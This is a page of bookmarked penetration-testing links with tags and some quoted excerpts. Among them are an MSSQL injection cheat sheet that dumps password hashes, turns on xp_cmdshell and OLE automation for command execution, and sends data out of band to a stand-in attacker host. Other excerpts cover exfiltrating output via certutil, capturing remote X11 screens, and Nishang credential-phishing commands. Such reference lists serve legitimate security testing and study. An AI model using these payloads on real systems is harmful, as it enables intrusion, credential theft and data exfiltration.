117 results tagged pentest
  • Windows Privilege Escalation Guide

    Script https://github.com/absolomb/WindowsEnum

    March 30, 2019 at 2:51:49 PM UTC
    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
    windows privilege escalation guide post hacking pentest
  • MSSQL Injection Cheat Sheet | pentestmonkey
    March 28, 2019 at 1:38:44 PM UTC
    - http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
    cheatsheet mssql sql injection enumeration enum post exploitation privilege escalation hacking pentest windows
  • SQL Injection Cheat Sheet: MSSQL — GracefulSecurity
    Version
    SELECT @@version;
    SELECT @@VERSION LIKE '%2008%';
    
    User details
    SELECT user;
    SELECT current_user;
    SELECT SYSTEM_USER;
    SELECT USER_NAME();
    SELECT USER_NAME(2);
    SELECT SUSER_SNAME();
    SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
    SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);
    
    Database details
    SELECT DB_NAME();
    SELECT DB_NAME(5);
    SELECT name FROM master..sysdatabases;
    
    Database credentials
    SELECT name %2b ':'  %2b master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;
    
    Server details
    SELECT @@servername;
    SELECT host_name();
    SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel');
    
    Table Names
    SELECT name FROM master..sysobjects WHERE xtype='U';
    SELECT table_name FROM information_schema.tables;
    
    Columns Names
    SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..sysobjects WHERE name = 'tablename');
    SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';
    
    No Quotes
    SELECT * FROM Users WHERE username = CHAR(97) + CHAR(98) + CHAR(99);
    ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) = 97;
    ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) < 128;
    
    String Concatenation
    SELECT CONCAT('a','a','a');
    SELECT 'a' %2b 'b' %2b 'c' %2b 'd';
    
    Conditionals
    IF 1=1 SELECT 'true' ELSE SELECT 'false';
    SELECT CASE WHEN 1=1 THEN true ELSE false END;
    
    Time-delay
    WAITFOR DELAY 'time_to_pass';
    WAITFOR TIME 'time_to_execute';
    
    Enable Command Execution
    EXEC sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'xp_cmdshell', 1;
    EXEC sp_configure reconfigure;
    
    Command Execution
    EXEC master.dbo.xp_cmdshell 'cmd';
    
    Enable Alternative Command Execution
    EXEC sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'OLE Automation Procedures', 1;
    EXEC sp_configure reconfigure;
    
    Alternative Command Execution
    DECLARE @execmd INT;
    EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT;
    EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%system32cmd.exe /c';
    
    "RunAs"
    SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'password', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
    EXECUTE AS USER = 'FooUser';
    
    Read Files
    BULK INSERT dbo.temp FROM 'c:\foobar.txt' WITH ( ROWTERMINATOR='n' );
    
    Out-of-Band Retrieval
    ;declare @q varchar(200);set @q='\attacker.controlledserver'+(SELECT SUBSTRING(@@version,1,9))+'.malicious.com/foo'; exec master.dbo.xp_dirtree @q; --  
    
    Substrings
    SUBSTRING(table_name,1,1) FROM information_schema.tables = 'A';
    ASCII(SUBSTRING(table_name,1,1)) FROM information_schema.tables > 96;
    
    Retrieve Nth Line
    SELECT TOP 1 table_name FROM information_schema.tables;
    SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables);
    March 28, 2019 at 1:36:53 PM UTC
    - https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/
    xp_cmdshell windows cheatsheet exploitation post postexploitation mssql sql injection enumeration enum hacking pentest
  • Red Team Tales 0x01: From MSSQL to RCE - Tarlogic Security - Cyber Security and Ethical hacking
    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

    The procedure to achieve it is as follows:

    1. Declare a variable of "table" type to hold the output returned by the xp_cmdshell procedure (remember that it returns the result in several rows).
    2. Dump the output of the command to the previous variable.
    3. Concatenate the rows of the table, separated by a line break.
    4. Encode the resulting string in Base64 and save it in a variable.
    5. Generate the certutil command, appending the string with the result.
    6. Execute it.
    March 28, 2019 at 12:15:52 AM UTC
    - https://www.tarlogic.com/en/blog/red-team-tales-0x01/
    htb querier giddy sql sqli mssql windows hacking redteam pentest rce xp_cmdshell
  • Xp_cmdshell and permissions – Tibor Karaszi's SQL Server blog
    March 28, 2019 at 12:00:51 AM UTC
    - http://sqlblog.karaszi.com/xp_cmdshell-and-permissions/
    xp_cmdshell mssql sql shell rce hacking pentest htb giddty querier
  • Pen Test Diary: Cisco Network Penetration Testing
    March 13, 2019 at 9:34:28 PM UTC
    - https://pentestdiary.blogspot.com/2017/08/cisco-network-penetration-testing.html
    pentest hackin cisco tuto howto
  • SQL Injection Cheat Sheet | Netsparker
    March 6, 2019 at 12:48:20 PM UTC
    - https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
    netsparker sql injection cheatsheet hacking pentest
  • X11 Hacking · Zach Grace
    apt-get install x11-utils xutils-dev imagemagick libxext-dev xspy
    xwininfo -root -tree -display 172.16.31.102:0
    xwd -root -screen -silent -display 10.10.10.10:0 > screenshot.xwd
    convert screenshot.xwd screenshot.png

    Watching the display

    ./xwatchwin -u 0.5 172.16.31.102:0 root

    February 26, 2019 at 8:03:36 AM UTC
    - https://zachgrace.com/training/x11/
    x11 hacking xwatchwin pentest redteam modbus ics scada ihm
  • Nishang: A Post-Exploitation Framework

    Port-Scan

    Powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Port-Scan.ps1'; Port-Scan -StartAddress 192.168.56.101 -Endaddress 192.168.56.105 -ResolveHost -ScanPort }"

    Remove-Update

    Powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Remove-Update.ps1'; Remove-Update KB2534366}"

    Invoke-CredentialsPhish

    Powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1'; Invoke-CredentialsPhish}"

    February 20, 2019 at 11:00:59 PM UTC
    - https://resources.infosecinstitute.com/nishang-a-post-exploitation-framework/
    nishang scripts tool windows post exploitation postex postexploitation hacking pentest powershell
  • Mimikatz (1/4): overview, how it works and countermeasures (A-to-Z tutorial)
    February 20, 2019 at 2:31:56 PM UTC
    - https://fr.scribd.com/document/235639383/Mimikatz-1-4-presentation-fonctionnement-et-contre-mesures-tuto-de-A-a-Z
    mimikatz tutoriel hacking pentest howto
  • Aki Helin / radamsa · GitLab
    February 10, 2019 at 11:06:36 PM UTC
    - https://gitlab.com/akihe/radamsa
    radamsa fuzzer fuzz hacking pentest
  • bettercap 2.x:

    And also https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/

    February 8, 2019 at 6:17:38 PM UTC
    - https://miloserdov.org/?p=1112&PageSpeed=noscript
    bettercap dns http https spoofing arp hacking pentest mitm caplet
  • GitHub - hslatman/awesome-industrial-control-system-security: A curated list of resources related to Industrial Control System (ICS) security.
    February 6, 2019 at 9:51:12 PM UTC
    - https://github.com/hslatman/awesome-industrial-control-system-security
    tools awesome scada ics hacking pentest
  • A Virgil's Guide to Pentest: Escalation Time
    February 6, 2019 at 10:44:33 AM UTC
    - https://virgil-cj.blogspot.com/2018/02/escalation-time.html
    privesc windows hacking pentest
  • How to evade Web Application Firewall and IPS using NMAP | Fzuckerman©
    February 5, 2019 at 2:50:50 PM UTC
    - https://fzuckerman.wordpress.com/2016/10/03/how-to-evade-web-application-firewall-and-ips-using-nmap/
    nmap evasion ids ips waf hacking pentest
  • NodeJs and NPM security
    January 28, 2019 at 11:33:47 AM UTC
    - https://www.icloud.com/keynote/0HajbmYF-6AThnFln9_lQC30A#nodejs%5Fsecurity%5Fappsec%5Fcali%5F2019
    nodejs npm hacking pentest howto tools tuto ppt
  • MEGA : Pentest Academy - Courses

    Big repo for Pentest Academy courses.

    January 22, 2019 at 3:48:04 PM UTC
    - https://mega.nz/#F!bCgTkYhA!haaINPhu_CPjkcl1ZBBOSw
    courses pentestacademy pentest hacking formation support pdf mega